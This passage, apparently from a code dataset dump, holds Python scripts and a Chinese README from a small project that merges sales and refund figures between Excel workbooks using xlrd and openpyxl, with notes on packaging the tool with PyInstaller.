"text": "# run_app.py\n\nimport sys\n\nfrom PyQt5.QtWidgets import QApplication\n\nfrom gov_files import FilesCrt\nfrom main_window import AppWindow\nfrom db_choice import DBChoice\n\n_excepthook = sys.excepthook\n\n\ndef my_exception_hook(exctype, value, traceback):\n # Print the error and traceback\n print(exctype, value, traceback)\n # Call the normal Exception hook after\n _excepthook(exctype, value, traceback)\n sys.exit(1)\n\nsys.excepthook = my_exception_hook\n\n\ndef main():\n from PyQt5.QtCore import pyqtRemoveInputHook\n\n pyqtRemoveInputHook()\n\n app = QApplication(sys.argv)\n DBChoice()\n main_window = AppWindow()\n\n _controller = FilesCrt()\n main_window.scan_files_signal.connect(_controller.on_scan_files)\n\n # when data changed on any widget\n main_window.change_data_signal.connect(_controller.on_change_data)\n\n # signal from open_dialog=dlg\n main_window.open_dialog.DB_connect_signal.connect(_controller.on_db_connection)\n\n main_window.first_open_data_base()\n\n main_window.show()\n sys.exit(app.exec_())\n\n\nif __name__ == \"__main__\":\n main()\n"
}
] | 2 |
dartmouth-cs98/hack-a-thing-2-rabbitmq | https://github.com/dartmouth-cs98/hack-a-thing-2-rabbitmq | b47bfe4008b345d766125412f950a5db7b4de631 | f1ffd70d8e5f7aacc45300beedf7892d3ad9ee30 | c6fbc784cd59be9198b90360352f0d1c9441e633 | refs/heads/master | 2021-07-03T18:37:58.478221 | 2017-09-26T02:01:06 | 2017-09-26T02:01:06 | 104,788,626 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.796316385269165,
"alphanum_fraction": 0.796316385269165,
"avg_line_length": 107.5882339477539,
"blob_id": "372ac2c5da5a027f9d6ad162b965603020bc672c",
"content_id": "3d9524421f77fb637edd3f65747e2f133a7916ea",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1846,
"license_type": "no_license",
"max_line_length": 593,
"num_lines": 17,
"path": "/README.md",
"repo_name": "dartmouth-cs98/hack-a-thing-2-rabbitmq",
"src_encoding": "UTF-8",
"text": "# Hack-a-thing Rabbitmq\n\n## Description\nI just tried to figure out how to create a messanging back-end. I messed around with the rabbitMQ tutorials and figured out the different types of exchanges and queues and how each one of them work. https://www.rabbitmq.com/getstarted.html \n\nFridge uses a task-queue. A bunch of messages are published to an exchange. Those messages remain in the exchange until a consumer is activated. The consumer is consume all the messages that is in the queue. If multiple consumers are activated, they will take turns consuming the messages in the queue. \n\nMessanger imitates a messanging backend. It uses a pub-sub type design. This is a bit different than the fridge. With the fridge, the producer created the single exchange while with messanger, each consumer creates it own exchange and attaches itself to the producer. \n\n## Responsibilities\nI originally was working with Barry on a Chrome extension. But we soon realized that there wasn't enough work for the both of us on the hack-a-thing so I split off to explore a messanging broker. \n\n## What you learned\nI learned about how a messanging broker works and what it can be used for. I created an elementary backend for a messanging back-end. \n\n## What didn't work\nWith the fridge, the producer can be running for a long time and when a consumer attached itself to the exchange, it will consume all the messages in that exchange. However, when it came to the messanger, because multiple consumers can be attached, each consumer had to create its own exchange on the fly. As a result, whenever a consumer was attached, it would only get the messages that were published after it was attached. To get around this some more complicated logic is required with storing all the previous messages and publishing them all at once whenever a new exchange is attached.\n"
},
{
"alpha_fraction": 0.6231671571731567,
"alphanum_fraction": 0.6290322542190552,
"avg_line_length": 19.66666603088379,
"blob_id": "dd6d84a3f9321f2c27032e0c81c164261255e2e5",
"content_id": "48a081e6006aa2d921f0594376ff311b48da9e5b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 682,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 33,
"path": "/messanger/producer.py",
"repo_name": "dartmouth-cs98/hack-a-thing-2-rabbitmq",
"src_encoding": "UTF-8",
"text": "import pika\nimport time\nimport sys\n\n\nconnection = pika.BlockingConnection(\n pika.ConnectionParameters('localhost'))\nchannel = connection.channel()\n\nchannel.exchange_declare(exchange='pub-sub', exchange_type='fanout')\n\nchannel.queue_declare(queue='task-queue', durable=True)\n\n\ntry:\n counter = 0\n while True:\n line = sys.stdin.readline()\n\n message = line\n\n channel.basic_publish(exchange='pub-sub', routing_key='', body=message,\n properties=pika.BasicProperties(\n delivery_mode = 2,\n ))\n\n print('Published... {}'.format(message))\n\n time.sleep(1)\n counter += 1\n\nexcept:\n connection.close()\n"
},
{
"alpha_fraction": 0.7357142567634583,
"alphanum_fraction": 0.7357142567634583,
"avg_line_length": 20.538461685180664,
"blob_id": "55fdf34d3901d9f963c5b8ed4b98cbe3ee345221",
"content_id": "d13ff25f3d842b128822160421b8da02292c0ba5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 560,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 26,
"path": "/messanger/consumer.py",
"repo_name": "dartmouth-cs98/hack-a-thing-2-rabbitmq",
"src_encoding": "UTF-8",
"text": "import pika\n\nconnection = pika.BlockingConnection(\n pika.ConnectionParameters('localhost'))\nchannel = connection.channel()\n\nchannel.exchange_declare(exchange='pub-sub', exchange_type='fanout')\n\nresult = channel.queue_declare(exclusive=True)\nqueue_name = result.method.queue\n\nchannel.queue_bind(exchange='pub-sub', queue=queue_name)\n\n\ndef callback(ch, method, properties, body):\n print(body)\n\n\ntry:\n print('Consuming...')\n\n channel.basic_consume(callback, queue=queue_name, no_ack=True)\n channel.start_consuming()\n\nexcept:\n connection.close()\n"
},
{
"alpha_fraction": 0.7080459594726562,
"alphanum_fraction": 0.7080459594726562,
"avg_line_length": 19.714284896850586,
"blob_id": "bb16eb51980f8b06ab8c67c39f9c595edd5b9e30",
"content_id": "7b3cfed52d27d9b3e997aeb9bf30fdbe8e6e88f8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 435,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 21,
"path": "/fridge/consumer.py",
"repo_name": "dartmouth-cs98/hack-a-thing-2-rabbitmq",
"src_encoding": "UTF-8",
"text": "import pika\n\nconnection = pika.BlockingConnection(\n pika.ConnectionParameters('localhost'))\nchannel = connection.channel()\n\nchannel.queue_declare(queue='task-queue', durable=True)\n\n\ndef callback(ch, method, properties, body):\n print('Consumed... {}'.format(body))\n\n\ntry:\n print('Consuming...')\n\n channel.basic_consume(callback, queue='task-queue', no_ack=True)\n channel.start_consuming()\n\nexcept:\n connection.close()\n"
},
{
"alpha_fraction": 0.5568720102310181,
"alphanum_fraction": 0.5604265332221985,
"avg_line_length": 29.14285659790039,
"blob_id": "25df04e64e0de6b5dc13aa4b940f264989b46d2d",
"content_id": "84838ebaa390430dee5eab1d88ac224c6f6a049e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 844,
"license_type": "no_license",
"max_line_length": 256,
"num_lines": 28,
"path": "/fridge/producer.py",
"repo_name": "dartmouth-cs98/hack-a-thing-2-rabbitmq",
"src_encoding": "UTF-8",
"text": "import pika\nimport time\n\nconnection = pika.BlockingConnection(\n pika.ConnectionParameters('localhost'))\nchannel = connection.channel()\n\nchannel.queue_declare(queue='task-queue', durable=True)\n\nfoods = ['candy', 'orange', 'apple', 'tomato', 'banana', 'rice', 'chicken', 'beef', 'pork', 'pork chop', 'snickers', 'soda', 'sprite', 'dr. pepper', 'bread', 'rolls', 'doritos', 'cheetos', 'tea', 'lemonade', 'gum', 'pepsi', 'coke', 'ice cream', 'mint gum']\ntry:\n counter = 0\n\n while True:\n for food in foods:\n message = food\n\n channel.basic_publish(exchange='',\n routing_key='task-queue',\n body=message)\n\n print('I put {} on the counter'.format(food))\n\n time.sleep(1)\n counter += 1\n\nexcept:\n connection.close()\n"
}
] | 5 |
zopefoundation/z3c.recipe.tag | https://github.com/zopefoundation/z3c.recipe.tag | ef1b766909e1d8808455267abc1405e5f4c9102f | c278ac2a3411a8357ca2462ac50b516c7e37e042 | 1500ffcd0b6f2aa1f6a6d0b16c27694670d02c62 | refs/heads/master | 2023-09-01T08:06:46.049111 | 2023-02-09T07:29:21 | 2023-02-09T07:29:21 | 8,905,788 | 0 | 0 | NOASSERTION | 2013-03-20T14:14:10 | 2022-09-16T09:03:53 | 2023-02-08T14:49:35 | Python |
[
{
"alpha_fraction": 0.5593220591545105,
"alphanum_fraction": 0.5718644261360168,
"avg_line_length": 32.90804672241211,
"blob_id": "47a2643c1926d2fa26a78dd8e0ba9a34533fdb3d",
"content_id": "d60f463cb8018eb0bd0ccb368f6b449f9e1c806d",
"detected_licenses": [
"ZPL-2.1"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2950,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 87,
"path": "/setup.py",
"repo_name": "zopefoundation/z3c.recipe.tag",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n##############################################################################\n#\n# Copyright (c) 2007 Zope Foundation and Contributors.\n# All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE.\n#\n##############################################################################\n\"\"\"Setup for z3c.recipe.tag\"\"\"\n\nimport os\n\nfrom setuptools import find_packages\nfrom setuptools import setup\n\n\ndef read(*rnames):\n with open(os.path.join(os.path.dirname(__file__), *rnames)) as f:\n return f.read()\n\n\nsetup(\n name=\"z3c.recipe.tag\",\n version='1.0.1.dev0',\n author=\"Ignas Mikalajūnas and the Zope Community\",\n description=\"Generate ctags from eggs for development.\",\n long_description=read('README.rst') + '\\n\\n' + read('CHANGES.rst'),\n license=\"ZPL 2.1\",\n maintainer=\"Paul Carduner\",\n maintainer_email=\"[email protected]\",\n classifiers=[\n \"Development Status :: 5 - Production/Stable\",\n \"Intended Audience :: Developers\",\n \"License :: OSI Approved :: Zope Public License\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\",\n \"Programming Language :: Python :: 3.10\",\n \"Programming Language :: Python :: 3.11\",\n \"Programming Language :: Python :: Implementation :: CPython\",\n \"Programming Language :: Python :: Implementation :: PyPy\",\n \"Framework :: Buildout\",\n \"Topic :: Software Development :: Build Tools\",\n \"Topic :: Text Editors :: Emacs\",\n \"Topic :: Utilities\",\n ],\n url='https://github.com/zopefoundation/z3c.recipe.tag',\n packages=find_packages('src'),\n package_dir={'': 'src'},\n namespace_packages=['z3c', 'z3c.recipe'],\n python_requires='>=3.7',\n extras_require=dict(\n test=[\n 'zope.testing',\n 'zope.testrunner',\n ],\n ),\n install_requires=[\n 'setuptools',\n 'zc.buildout >= 3.0',\n 'zc.recipe.egg',\n # these two come from apt-get:\n # 'id-utils',\n # 'ctags-exuberant'\n # alternately, on Mac, use macports (macports.org) and\n # ``sudo port install ctags idutils``\n ],\n entry_points={\n 'zc.buildout': [\n 'default = z3c.recipe.tag:TagsMaker',\n 'tags = z3c.recipe.tag:TagsMaker',\n ],\n 'console_scripts': [\n 'build_tags = z3c.recipe.tag:build_tags',\n ],\n },\n zip_safe=False,\n include_package_data=True,\n)\n"
},
{
"alpha_fraction": 0.5565217137336731,
"alphanum_fraction": 0.5649175643920898,
"avg_line_length": 30.761905670166016,
"blob_id": "a3880ff79b53521533dd3a9f3044e7e9024170b4",
"content_id": "9de87bb406a0e0a6949fa9779f99fae8e832fcab",
"detected_licenses": [
"ZPL-2.1"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3335,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 105,
"path": "/src/z3c/recipe/tag/tests.py",
"repo_name": "zopefoundation/z3c.recipe.tag",
"src_encoding": "UTF-8",
"text": "import doctest\nimport os\nimport re\nimport unittest\n\nimport zc.buildout.testing\nfrom zope.testing import renormalizing\n\n\ndef doctest_tags_recipe():\n \"\"\"Test for z3c.recipe.tag\n\n >>> write('buildout.cfg',\n ... '''\n ... [buildout]\n ... parts = tags\n ...\n ... [tags]\n ... recipe = z3c.recipe.tag\n ... eggs =\n ... z3c.recipe.tag\n ... ''')\n\n >>> print(system(join('bin', 'buildout')).rstrip())\n Installing tags.\n Generated script '/sample-buildout/bin/tags'.\n\n >>> cat('bin', 'tags')\n #!/usr/bin/python\n <BLANKLINE>\n import sys\n sys.path[0:0] = [\n '/z3c.recipe.tag/src',\n ]\n <BLANKLINE>\n import os\n sys.argv[0] = os.path.abspath(sys.argv[0])\n os.chdir('.../_TEST_/sample-buildout')\n <BLANKLINE>\n <BLANKLINE>\n import z3c.recipe.tag\n <BLANKLINE>\n if __name__ == '__main__':\n sys.exit(z3c.recipe.tag.build_tags())\n\n \"\"\"\n\n\ndef setUp(test):\n zc.buildout.testing.buildoutSetUp(test)\n zc.buildout.testing.install('zc.recipe.egg', test)\n zc.buildout.testing.install_develop('z3c.recipe.tag', test)\n\n\ndef tearDown(test):\n zc.buildout.testing.buildoutTearDown(test)\n\n\nchecker = renormalizing.RENormalizing([\n zc.buildout.testing.normalize_path,\n # zope.whatever-1.2.3-py3.7.egg -> zope.whatever-pyN.N.egg\n (re.compile(r'-[^ /]+-py\\d[.]\\d(-\\S+)?.egg'), '-pyN.N.egg'),\n # #!/path/to/whatever/python3.2mu -> #!/usr/bin/python\n (re.compile('#![^\\n]+/python[0-9.mu]*'), '#!/usr/bin/python'),\n # location of this source tree\n (re.compile(\"\"\"['\"][^\\n\"']+z3c.recipe.tag[^\\n\"']*['\"],\"\"\"),\n \"'/z3c.recipe.tag/src',\"),\n # I've no idea what causes these\n # Couldn't find index page for 'zc.recipe.egg' (maybe misspelled?)\n # error messages, let's just suppress them\n (re.compile(\"Couldn't find index page for '[a-zA-Z0-9.]+' \"\n r\"\\(maybe misspelled\\?\\)\\n\"), ''),\n # I've no idea what causes these\n # Not found: /tmp/tmpJKH0LKbuildouttests/zc.buildout/\n # error messages, let's just suppress them\n (re.compile(\"Not found: .*buildouttests/[a-zA-Z0-9.]+/\\n\"), ''),\n])\n\nif os.getenv('RUNNING_UNDER_TOX'): # pragma: no cover\n # tox installs our test dependencies into the virtualenv,\n # and zc.buildout has no site isolation, so it finds them there,\n # so it doesn't add them to sys.path in the generated scripts\n checker += renormalizing.RENormalizing([\n (re.compile(r\"\\s*'/sample-buildout/eggs/zc.recipe.egg-pyN.N.egg',\\n\"),\n ''),\n (re.compile(r\"\\s*'/sample-buildout/eggs/zc.buildout-pyN.N.egg',\\n\"),\n ''),\n (re.compile(r\"\\s*'/sample-buildout/eggs/distribute-pyN.N.egg',\\n\"),\n ''),\n (re.compile(r\"\\s*'/sample-buildout/eggs/setuptools-pyN.N.egg',\\n\"),\n ''),\n (re.compile(r\"'.*/site-packages'\"), \"'/z3c.recipe.tag/src'\"),\n (re.compile(r\"#!/.*/bin/pypy.*\"), \"#!/usr/bin/python\"),\n ])\n\n\ndef test_suite():\n return unittest.TestSuite([\n doctest.DocTestSuite(\n setUp=setUp, tearDown=tearDown, checker=checker,\n optionflags=(\n doctest.NORMALIZE_WHITESPACE\n | doctest.ELLIPSIS\n | doctest.REPORT_NDIFF)),\n ])\n"
},
{
"alpha_fraction": 0.5739673376083374,
"alphanum_fraction": 0.6378481984138489,
"avg_line_length": 20.030303955078125,
"blob_id": "e026fdf4449fd5971887264ef60333322d791ec4",
"content_id": "782effdb4e6f763632be193173ae75b72062e359",
"detected_licenses": [
"ZPL-2.1"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 2082,
"license_type": "permissive",
"max_line_length": 102,
"num_lines": 99,
"path": "/CHANGES.rst",
"repo_name": "zopefoundation/z3c.recipe.tag",
"src_encoding": "UTF-8",
"text": "=======\nCHANGES\n=======\n\n1.0.1 (unreleased)\n------------------\n\n- Nothing changed yet.\n\n\n1.0 (2023-02-09)\n----------------\n\n- Drop support for Python < 3.7.\n\n- Add support for Python 3.7 up to 3.11.\n\n- Require ``zc.buildout >= 3``.\n\n\n0.8 (2014-10-20)\n----------------\n\n- Add --tag-relative option to support relative tag generation.\n\n\n0.7 (2013-03-22)\n----------------\n\n- Support and require zc.buildout 2.0.\n\n- Add supported Python version (3.6, 2.7, 3.2, 3.3) classifiers to\n setup.py\n\n\n0.6 (2012-09-07)\n----------------\n\n- Update manifest to allow package generation fron non-VCS export. Counters the\n 0.5 \"brown bag\" release.\n\n\n0.5 (2012-09-06)\n----------------\n\n- Exclude Python import statements by default from showing up as tags.\n\n- Add 'defaults' option to allow adding default command line options (e.g. to\n set '-v' by default)\n\n\n0.4.1 (2012-01-11)\n------------------\n\n* Skip nonexistent sys.path directories to avoid ctags warnings.\n\n\n0.4.0 (2010-08-29)\n------------------\n\n* Support new script features from zc.buildout 1.5 and higher. This version\n requires zc.buildout 1.5 or higher.\n\n* Also index Mako and HTML files with id-utils.\n\n\n0.3.0 (2009-08-16)\n------------------\n\n* Add support for using this recipe as a `paver <http://www.blueskyonmars.com/projects/paver/>`_ task.\n\n* Also index Javascript, CSS and ReStructuredText files with id-utils.\n\n* Define a default entry point for zc.buildout, so you can simply say::\n\n [ctags]\n recipe = z3c.recipe.tag\n\n\n0.2.0 (2008-08-28)\n------------------\n\n* Allow command-line choices for what files to build, and what languages ctags\n should parse. (Note that the default behavior of running ``./bin/tags``\n is the same as previous releases.)\n\n* Support the Mac OS X packaging system \"macports\" (exuberant ctags is\n ``ctags-exuberant`` in Ubuntu and ``ctags`` in macports).\n\n* Support creating BBEdit-style ctags files.\n\n* Small changes for development (use bootstrap external, set svn:ignore)\n\n0.1.0 (2008-03-16)\n------------------\n\n- Initial release.\n\n * buildout recipe for generating ctags of eggs used.\n"
},
{
"alpha_fraction": 0.5403017997741699,
"alphanum_fraction": 0.5443503856658936,
"avg_line_length": 34.28571319580078,
"blob_id": "d3fcc1c6e03092c196a32f624b0176eef3ccd5fa",
"content_id": "9e02da20bd56779aaa941010d57f9639f2fbec84",
"detected_licenses": [
"ZPL-2.1"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8151,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 231,
"path": "/src/z3c/recipe/tag/__init__.py",
"repo_name": "zopefoundation/z3c.recipe.tag",
"src_encoding": "UTF-8",
"text": "##############################################################################\n#\n# Copyright (c) 2007 Zope Foundation and Contributors.\n# All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE.\n#\n##############################################################################\nimport optparse\nimport os\nimport subprocess\nimport sys\n\nimport pkg_resources\n\nimport zc.buildout.easy_install\nimport zc.recipe.egg\n\n\nclass TagsMaker:\n\n def __init__(self, buildout, name, options):\n self.buildout = buildout\n self.name = name\n self.options = options\n # We do this early so the \"extends\" functionality works before we get\n # to the other options below.\n self._delegated = zc.recipe.egg.Egg(buildout, name, options)\n options['script'] = os.path.join(buildout['buildout']['bin-directory'],\n options.get('script', self.name),\n )\n if not options.get('working-directory', ''):\n options['location'] = os.path.join(\n buildout['buildout']['parts-directory'], name)\n\n def install(self):\n options = self.options\n generated = []\n eggs, ws = self._delegated.working_set(('z3c.recipe.tag',))\n\n wd = options.get('working-directory', '')\n if not wd:\n wd = options['location']\n if os.path.exists(wd):\n assert os.path.isdir(wd)\n else:\n os.mkdir(wd)\n generated.append(wd)\n\n initialization = initialization_template % (\n self.buildout['buildout']['directory'])\n\n env_section = options.get('environment', '').strip()\n if env_section:\n env = self.buildout[env_section]\n for key, value in env.items():\n initialization += env_template % (key, value)\n\n initialization_section = options.get('initialization', '').strip()\n if initialization_section:\n initialization += initialization_section\n\n arguments = options.get('defaults', '')\n if arguments:\n arguments = arguments + ' + sys.argv[1:]'\n\n generated.extend(zc.buildout.easy_install.scripts(\n [(options['script'], 'z3c.recipe.tag', 'build_tags')],\n ws, options['executable'],\n self.buildout['buildout']['bin-directory'],\n extra_paths=self._delegated.extra_paths,\n initialization=initialization,\n ))\n\n return generated\n\n update = install\n\n\ninitialization_template = \"\"\"import os\nsys.argv[0] = os.path.abspath(sys.argv[0])\nos.chdir(%r)\n\"\"\"\n\nenv_template = \"\"\"os.environ['%s'] = %r\n\"\"\"\n\n\ndef getpath(candidates):\n paths = os.environ['PATH'].split(os.pathsep)\n for c in candidates:\n for p in paths:\n full = os.path.join(p, c)\n if os.path.exists(full):\n return full\n raise RuntimeError(\n 'Can\\'t find executable for any of: %s' % candidates)\n\n\nclass Builder:\n def get_relpaths(self, paths):\n working_dir = os.getcwd()\n return [os.path.relpath(path, working_dir) for path in paths]\n\n def __call__(self, targets=None, languages=None, tag_relative=False):\n if not targets:\n targets = ('idutils', 'ctags_vi', 'ctags_emacs') # legacy behavior\n self.languages = languages or ''\n self.tag_relative = tag_relative\n paths = [path for path in sys.path\n if os.path.isdir(path)]\n if self.tag_relative:\n # ctags will ignore --tag-relative=yes for absolute paths so we\n # must pass relative paths to it.\n paths = self.get_relpaths(paths)\n self.paths = 
paths\n results = {}\n for target in targets:\n tool_candidates, arguments, source, destination = getattr(\n self, '_build_{}'.format(target))()\n arguments[0:0] = [getpath(tool_candidates)]\n res = subprocess.call(arguments)\n if res == 0:\n res = subprocess.call(['mv', source, destination])\n results[target] = res\n return results\n\n def _build_idutils(self):\n return [\n [\n 'mkid'\n ], [\n '-m',\n pkg_resources.resource_filename(\n \"z3c.recipe.tag\", \"id-lang.map.txt\"),\n '-o',\n 'ID.new'\n ] + self.paths,\n 'ID.new',\n 'ID']\n\n def _build_ctags_vi(self):\n res = [['ctags-exuberant', 'ctags'],\n ['-R',\n '--python-kinds=-i',\n '-f',\n 'tags.new'] + self.paths,\n 'tags.new',\n 'tags']\n if self.languages:\n res[1][0:0] = ['--languages=%s' % self.languages]\n if self.tag_relative:\n res[1][0:0] = ['--tag-relative=yes']\n return res\n\n def _build_ctags_emacs(self):\n res = self._build_ctags_vi()\n res[1][0:0] = ['-e']\n res[3] = 'TAGS'\n return res\n\n def _build_ctags_bbedit(self):\n res = self._build_ctags_vi()\n try:\n res[1].remove('--tag-relative=yes')\n except ValueError:\n pass\n res[1][0:0] = [\n '--excmd=number', '--tag-relative=no', '--fields=+a+m+n+S']\n return res\n\n\ndef append_const(option, opt_str, value, parser, const):\n # 'append_const' action added in Py 2.5, and we're in 2.4 :-(\n if getattr(parser.values, 'targets', None) is None:\n parser.values.targets = []\n parser.values.targets.append(const)\n\n\ndef build_tags(args=None):\n parser = optparse.OptionParser()\n parser.add_option('-l', '--languages', dest='languages',\n default='-JavaScript',\n help='ctags comma-separated list of languages. '\n 'defaults to ``-JavaScript``')\n parser.add_option('-e', '--ctags-emacs', action='callback',\n callback=append_const, callback_args=('ctags_emacs',),\n help='flag to build emacs ctags ``TAGS`` file')\n parser.add_option('-v', '--ctags-vi', action='callback',\n callback=append_const, callback_args=('ctags_vi',),\n help='flag to build vi ctags ``tags`` file')\n parser.add_option('-b', '--ctags-bbedit', action='callback',\n callback=append_const, callback_args=('ctags_bbedit',),\n help='flag to build bbedit ctags ``tags`` file')\n parser.add_option('-i', '--idutils', action='callback',\n callback=append_const, callback_args=('idutils',),\n help='flag to build idutils ``ID`` file')\n parser.add_option('-r', '--tag-relative', action='store_true',\n dest='tag_relative', default=False,\n help=('generate tags with paths relative to'\n ' tags file instead of absolute paths'\n ' (works with vim tags only)'))\n options, args = parser.parse_args(args)\n if args:\n parser.error('no arguments accepted')\n targets = getattr(options, 'targets', None)\n if (targets and 'ctags_bbedit' in targets and 'ctags_vi' in targets):\n parser.error('cannot build both vi and bbedit ctags files (same name)')\n builder = Builder()\n builder(targets, languages=options.languages,\n tag_relative=options.tag_relative)\n\n\ntry:\n import paver.easy\nexcept ImportError:\n HAS_PAVER = False\nelse: # pragma: nocover\n HAS_PAVER = True\n\nif HAS_PAVER: # pragma: nocover\n @paver.easy.task\n @paver.easy.consume_args\n def tags(args):\n \"\"\"Build tags database file for emacs, vim, or bbedit\"\"\"\n build_tags(args)\n"
},
{
"alpha_fraction": 0.6839565634727478,
"alphanum_fraction": 0.6880578994750977,
"avg_line_length": 29.477941513061523,
"blob_id": "ba0cdff92d53ab868cda28a3e2749540a8ca741f",
"content_id": "cbdcd32eb03e64204e4f5d9265343ab52bc89635",
"detected_licenses": [
"ZPL-2.1"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 4145,
"license_type": "permissive",
"max_line_length": 99,
"num_lines": 136,
"path": "/README.rst",
"repo_name": "zopefoundation/z3c.recipe.tag",
"src_encoding": "UTF-8",
"text": "==============\nz3c.recipe.tag\n==============\n\n|buildstatus|_\n\n.. contents::\n\nIntroduction\n------------\n\nThis recipe generates a TAGS database file that can be used with a\nnumber of different editors to quickly look up class and function\ndefinitions in your package's source files and egg dependencies.\n\nDependencies\n------------\n\nBefore running a tags enabled buildout, you must install the\nappropriate command line tag generation tools: exuberant-ctags and\nid-utils. In Ubuntu, you can install these with apt-get::\n\n $ sudo apt-get install exuberant-ctags id-utils\n\nOn a Mac, download and install ``port`` from http://www.macports.org/ and then\ninstall ctags and idutils in this way::\n\n $ sudo port install ctags idutils\n\nHow to use this recipe\n----------------------\n\nWith Buildout\n.............\n\nSuppose you have an egg called ``MyApplication``. To use this recipe with\nbuildout, you would add the following to the ``buildout.cfg`` file::\n\n [tags]\n recipe = z3c.recipe.tag\n eggs = MyApplication\n\nThis produces a script file in the ``bin/`` directory which you can\nthen run like this::\n\n $ ./bin/tags\n\nBy default, this script produces three files in the directory from\nwhich you ran the script:\n\n- a ctags file called ``TAGS`` for use by emacs,\n- a ctags file called ``tags`` for use by vi, and\n- an idutils file called ``ID`` for use by id-utils (gid, lid).\n\nYou can then use these files in your editor of choice.\n\nOptionally, you can select which files to build. The following is the output\nof ``./bin/tags --help``::\n\n usage: build_tags [options]\n\n options:\n -h, --help show this help message and exit\n -l LANGUAGES, --languages=LANGUAGES\n ctags comma-separated list of languages. defaults to\n ``-JavaScript``\n -e, --ctags-emacs flag to build emacs ctags ``TAGS`` file\n -v, --ctags-vi flag to build vi ctags ``tags`` file\n -b, --ctags-bbedit flag to build bbedit ctags ``tags`` file\n -i, --idutils flag to build idutils ``ID`` file\n\nIf you'd like to set command line options by default (e.g. to limit\nbuilding to ctags-vi by default) you can pass the ``default`` option in\nyour buildout.cfg::\n\n [tags]\n recipe = z3c.recipe.tag\n eggs = MyApplication\n default = ['-v']\n\nWith virtualenv\n...............\n\nYou can use this with `virtualenv\n<https://pypi.python.org/pypi/virtualenv>`__ too::\n\n my_venv/bin/pip install z3c.recipe.tag\n my_venv/bin/build_tags\n\nthis will build a tags file for all the packages installed in that virtualenv.\n\nWith Paver\n..........\n\nIf you are using `Paver\n<http://www.blueskyonmars.com/projects/paver/>`_ and already have\nz3c.recipe.tag installed, then all you have to do is add this line to\nyour ``pavement.py`` file::\n\n import z3c.recipe.tag\n\nAnd then run the ``z3c.recipe.tag.tags`` task from the command line::\n\n $ paver z3c.recipe.tag.tags\n\nAdditional Resources\n--------------------\n\nFor additional information on using tags tables with different editors\nsee the following websites:\n\n- **Emacs**: http://www.gnu.org/software/emacs/manual/html_node/emacs/Tags.html\n\n - to jump to the location of a tag, type ``M-x find-tag`` and the\n name of the tag. Or use ``M-.`` to jump to the tag matching the token\n the cursor is currently on. 
The first time you do this, you will\n be prompted for the location of the TAGS file.\n\n- **VIM**: http://vimdoc.sourceforge.net/htmldoc/tagsrch.html\n\n- **BBEdit**: http://pine.barebones.com/manual/BBEdit_9_User_Manual.pdf\n Chapter 14, page 324\n\nFor more information on ctags, visit http://ctags.sourceforge.net/\n\n(BBEdit_ is a Macintosh text editor.)\n\n.. _BBEdit: http://barebones.com/products/bbedit/\n\nFor more information about GNU id-utils (basically a local text\nindexing/search engine; think of it as a very fast version of ``grep\n-w``), see the `id-utils manual\n<http://www.gnu.org/software/idutils/manual/idutils.html>`__.\n\n.. |buildstatus| image:: https://github.com/zopefoundation/z3c.recipe.tag/workflows/tests/badge.svg\n.. _buildstatus: https://github.com/zopefoundation/z3c.recipe.tag/actions?query=workflow%3Atests\n"
}
] | 5 |
lalet/Test
|
https://github.com/lalet/Test
|
7d4c8a81be25db5e0858fdd12f032e729d0db3f1
|
01a72338c994a0d582e7465cb53c6cc83b0d8d4c
|
6a741c90ff42b0f6ff69512aaa056b424561a572
|
refs/heads/master
| 2016-08-07T05:41:32.948385 | 2015-03-08T16:34:27 | 2015-03-08T16:34:27 | 31,856,665 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5837320685386658,
"alphanum_fraction": 0.6507176756858826,
"avg_line_length": 26.66666603088379,
"blob_id": "072d315532aa1b78e4ad0d710d0167819e072753",
"content_id": "3c1b2990dc948f9c53b092d53c6e94fd1aed9f54",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 418,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 15,
"path": "/locu.py",
"repo_name": "lalet/Test",
"src_encoding": "UTF-8",
